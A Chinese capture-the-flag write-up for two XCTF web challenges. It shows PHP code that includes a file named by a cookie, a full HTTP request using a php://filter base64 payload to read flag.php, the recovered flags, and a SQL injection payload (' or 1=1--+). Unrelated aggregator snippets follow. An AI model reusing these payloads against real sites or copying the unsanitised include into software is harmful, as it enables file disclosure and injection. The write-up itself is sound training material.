攻防世界-WEB-10/6练习

news/2024/11/15 6:18:25/

fileinclude

打开题目发现php代码,发现cookie处存在文件包含漏洞

<?php
if( !ini_get('display_errors') ) {ini_set('display_errors', 'On');}
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{@setcookie("language","english");@include("english.php");
}
else
{@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>

在这里插入图片描述

构造payload

通过base64 读取flag.php文件

GET / HTTP/1.1
Host: 61.147.171.105:60325
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Cookie:language=php://filter/read=convert.base64-encode/resource=flag

在这里插入图片描述

解密后得到flag

cyberpeace{324be44cf875ca44e495c247596618c8}

在这里插入图片描述

同时根据题目信息得到该环境存在如下文件: index.php flag.php english.php chinese.php 有兴趣可以自己搭建看看。

依次读取内容如下:

#index.php
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head><?php
if( !ini_get('display_errors') ) {ini_set('display_errors', 'On');}
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{@setcookie("language","english");@include("english.php");
}
else
{@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>
</html>
#flag.php
<?php
$flag="cyberpeace{324be44cf875ca44e495c247596618c8}";
?>
#english.php
Please choose the language you want : English or Chinese
<?php
echo "<h1>Hi,EveryOne,The flag is in flag.php</h1>";
?>
#chinese.php
Please choose the language you want : English or Chinese
<?phpecho "<h1>HI,flag在flag.php</h1>";?>

inget

打开题目提示让传参id并尝试绕过waf

在这里插入图片描述

构造payload 得到flag,没有什么难度

?id=1' or 1=1--+cyberpeace{af0b21ac8ef39d514c807499d0b4fc8a}

在这里插入图片描述


http://www.ppmy.cn/news/646968.html

相关文章

攻防比赛中蓝队常用的攻击方法

蓝队常用的攻击手段 在实战过程中&#xff0c;蓝队专家根据实战攻防演练的任务特点逐渐总结 出一套成熟的做法&#xff1a;外网纵向突破重点寻找薄弱点&#xff0c;围绕薄弱点&#xff0c;利 用各种攻击手段实现突破&#xff1b;内网横向拓展以突破点为支点&#xff0c;利用各…

如何提高蓝队在实战攻防演习中的防御水平?

重新认识蓝队体系 背景 随着近几年复杂国际形势的大背景和国内护网活动的锤炼&#xff0c;传统的安全运维/服务类解决方案在面临新的挑战和要求下显得捉襟见肘&#xff0c;日渐吃力。越来越多的组织开始引入红队服务来寻求对信息系统的更接近实战的威胁评估。与此同时&#x…

军团的崛起:利用多态指挥多兵种作战

军团的崛起 军团的崛起 利用多态指挥多兵种作战 1.军团类Army中的数组group存储着组成军团的战斗单位,它的构造函数随机地创建坦克\潜艇\加油车\修理车等对象,数量由其参数指定.方法getSelected根据参数,返回数组的第i个元素.随机数的类是Random. 2.坦克\潜艇\加油车\修理车…

七人制足球战术

闲来无事,研究研究. 一&#xff0e;七人制足球战术   1、后位锅状站位   7人场一般有三个后位   拖后中位是核心   三个后位站位呈锅状  中位是锅底   两位边后位要注意站得靠前一点 (两边后卫就是锅耳,wild wind 按)   一旦对方前锋渗入边卫和中卫之间   中卫…

hw蓝队防守技战法

一、备战阶段——知彼知己&#xff0c;百战不殆 “未知攻&#xff0c;焉知防”。如果企业安全部门不了解攻击者的攻击思路、常用手段&#xff0c;有效的防守将无从谈起。从攻击者实战视角去加强自身防护能力&#xff0c;将是未来的主流防护思想。 红队眼中的防守弱点 1.梳理…

蓝队攻击的四个阶段(二)

目录 一&#xff0c;漏洞利用工具 (1)WebLogic 全版本需洞利用工具 (2)Struts2 综合漏洞利用工具 (3)sqlmap 注入工具 (4)vSphere Client RCE 漏洞(CVE-2021-21972)利用工具 (5)Windows Print Spooler 权限提升漏洞(CVE-2021-1675) (6)Exchange Server漏洞组合利用(CVE-2…

Java框架学习(二)SSM体系:Spring、SpringMVC、MybatisPlus

文章目录 SpringIoC控制反转DI 依赖注入BeanBean基础配置namescope Bean实例化方式Bean的生命周期 依赖注入方式依赖自动装配 Mybatis-Plus配置BaseMapper通用Service常用注解TableNameTableId雪花算法 TableFieldTableLogic 条件构造器和常用接口QueryWrapperUpdateWrapper 插…

Flink流批一体计算(10):PyFlink Tabel API

简述 PyFlink 是 Apache Flink 的 Python API&#xff0c;你可以使用它构建可扩展的批处理和流处理任务&#xff0c;例如实时数据处理管道、大规模探索性数据分析、机器学习&#xff08;ML&#xff09;管道和 ETL 处理。 如果你对 Python 和 Pandas 等库已经比较熟悉&#x…